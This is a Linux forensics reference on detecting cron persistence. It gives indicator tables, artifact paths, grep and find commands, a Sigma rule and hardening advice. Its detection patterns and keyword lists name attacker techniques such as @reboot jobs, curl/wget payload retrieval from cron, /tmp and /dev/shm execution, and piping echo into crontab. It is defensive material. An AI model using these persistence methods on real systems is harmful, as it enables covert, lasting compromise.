This note documents detection patterns related to Cron Persistence on Linux systems.
Direct Indicators
| Source | Grep Pattern / Artifact | Meaning | Forensic Value | Notes |
|---|---|---|---|---|
/etc/crontab | New scheduled command | System-wide persistence entry | Critical | Primary cron persistence artifact. |
/etc/cron.d/ | New cron file | Drop-in scheduled persistence | Critical | Common stealth location. |
/var/spool/cron/ | User cron entry | Per-user persistence | Critical | Often tied to compromised account. |
| Shell history | crontab -e | Interactive cron modification | Critical | Strong operator evidence. |
| Shell history | `echo ... | crontab` | Inline cron insertion | Critical |
| Shell history | @reboot | Boot-triggered persistence | Critical | Very high-value persistence signal. |
| Cron entry | curl, wget | Remote payload retrieval | Critical | Strong malicious automation signal. |
| Cron entry | bash, sh, python | Scripted execution | Critical | Common shell persistence pattern. |
| Cron entry | /tmp, /dev/shm | Temp payload execution | Critical | Highly suspicious path. |
auditd | write to cron files | Process-level persistence evidence | Critical | Best attribution if enabled. |
| File timestamps | recent cron modification | Persistence timing anchor | Critical | Correlates with intrusion window. |
journalctl | cron daemon execution | Scheduled execution trace | High | Useful when execution already occurred. |
| Syslog | CRON entries | Job execution records | Critical | Confirms active trigger. |
| File ownership anomaly | unexpected cron owner | High | Can reveal attacker mistakes. |
Indirect Indicators
| Indicator | What To Look For | Forensic Value | Notes |
|---|---|---|---|
| Cron added after SSH success | Stabilization after foothold | Critical | Common attacker progression. |
| Cron under dormant account | Hidden persistence | Critical | Often low-visibility tactic. |
| Frequent short interval job | Every minute execution | Critical | Common beacon pattern. |
| Hidden script called by cron | Secondary payload in temp/home | Critical | Common staged persistence. |
| Cron runs downloader repeatedly | Re-fetch resilience | Critical | Operator durability pattern. |
| Root cron modified unexpectedly | Privileged persistence | Critical | High severity. |
| Cron plus key/user creation | Multi-layer persistence | Critical | Strong hostile sequence. |
| Commentless cron drop-in file | Minimalist attacker insertion | High | Often manually dropped. |
| Cron file recent but no admin ticket | Context anomaly | High | Important operational clue. |
| Cron executes deleted file path | Cleanup attempt after persistence | High | Indicates incomplete cleanup. |
Common Tools
| Tool | Usage |
|---|---|
crontab -e | Interactive cron editing. |
| `echo ... | crontab` |
| Direct file edit | /etc/crontab, /etc/cron.d/*. |
sed -i | Silent cron modification. |
printf >> | Append persistence line. |
Relevant Artifacts
| Artifact | Path / Command | Forensic Value | Notes |
|---|---|---|---|
| System cron | /etc/crontab | Critical | Main system persistence file. |
| Cron drop-ins | /etc/cron.d/ | Critical | Very common attacker location. |
| User cron | /var/spool/cron/, /var/spool/cron/crontabs/ | Critical | Per-user persistence truth. |
| Periodic jobs | /etc/cron.hourly, /etc/cron.daily, /etc/cron.weekly, /etc/cron.monthly | High | Script placement persistence. |
| Shell history | .bash_history, .zsh_history | Critical | Cron insertion commands. |
| Audit logs | /var/log/audit/audit.log | Critical | File write attribution. |
| Syslog / auth logs | /var/log/syslog, /var/log/cron, /var/log/messages | Critical | Execution evidence. |
| Journald | journalctl | High | Cron execution visibility. |
| Script targets | referenced file paths | Critical | Often actual payload location. |
MITRE ATT&CK References
- T1053 Scheduled Task or Job
- T1053.003 Cron
- T1059 Command and Scripting Interpreter
Decision Tree
-
Is cron modified?
- Enumerate system and user cron sources.
-
Which account owns persistence?
- Determine privilege and account legitimacy.
-
What executes?
- Inspect command, path, interpreter, interval.
-
Has cron already executed?
- Review syslog / journal execution traces.
-
Is payload present?
- Inspect referenced scripts/binaries.
-
Pivot
- Cron owner → login history.
- Script path → payload analysis.
- Timestamp → intrusion correlation.
-
Confirm persistence
- Unknown cron + suspicious command + intrusion timeline = malicious persistence.
Example Detection Templates
Grep
grep -R "@reboot\|curl\|wget\|bash\|python\|/tmp\|/dev/shm" /etc/crontab /etc/cron* /var/spool/cron 2>/dev/null
grep -R "crontab" /home/*/.bash_history /root/.bash_history 2>/dev/null
grep -R "echo .*crontab\|crontab -e" /home /root 2>/dev/null
Journalctl
journalctl | grep CRON
File Inspection
find /etc/cron* /var/spool/cron -type f -printf '%TY-%Tm-%Td %TT %p\n' 2>/dev/null | sort
stat /etc/crontab
Sigma
title: Linux Cron Persistence
id: linux-cron-persistence
status: experimental
description: Detects suspicious cron persistence entries and scheduled execution indicators
logsource:
product: linux
detection:
selection_keywords:
message|contains:
- 'CRON'
- '@reboot'
- 'curl'
- 'wget'
condition: selection_keywords
fields:
- message
- hostname
falsepositives:
- Legitimate scheduled administration
level: high
tags:
- attack.persistence
- attack.t1053.003
Mitigation & Hardening
| Control Area | Mitigation | Effectiveness | Notes |
|---|---|---|---|
| Cron review | Baseline all cron entries | Critical | Unknown jobs should stand out. |
| File monitoring | Watch cron paths for writes | Critical | Excellent invariant detection. |
| Least privilege | Restrict cron access | High | Reduces persistence options. |
| Auditd | Track writes to cron locations | High | Strong attribution. |
| Temp execution control | Prevent temp payload execution | High | Blocks common cron payloads. |
| Logging | Preserve cron execution logs | High | Needed to confirm runtime behavior. |
Fast Triage Checks
| Question | Command / Artifact | Why It Matters |
|---|---|---|
| Any suspicious cron entries? | grep cron files | Immediate persistence check. |
| Which user owns cron? | inspect spool ownership | Actor context. |
| Does cron call temp file? | inspect paths | High-confidence suspicion. |
| Has cron executed? | grep CRON logs | Confirms active trigger. |
| Is payload still present? | inspect target file | Execution target analysis. |
| Was cron added post-login? | correlate timestamps | Intrusion chain. |
High Value Grep Strings
| Pattern | Why It Matters |
|---|---|
@reboot | Boot persistence. |
curl | Remote retrieval. |
wget | Remote retrieval. |
bash | Shell execution. |
python | Interpreter execution. |
/tmp | Temp payload path. |
/dev/shm | Stealth temp path. |
crontab -e | Interactive modification. |
Analyst Notes
| Scenario | Interpretation |
|---|---|
| Every-minute cron + temp shell | Strong beacon persistence. |
| Root cron modified recently | High severity privileged persistence. |
| Cron calls deleted file | Cleanup after persistence insertion likely. |
| User cron under fresh account | Persistence tied to compromise. |
| Cron plus downloader | Resilient payload staging pattern. |
| Multiple cron layers | Operator redundancy. |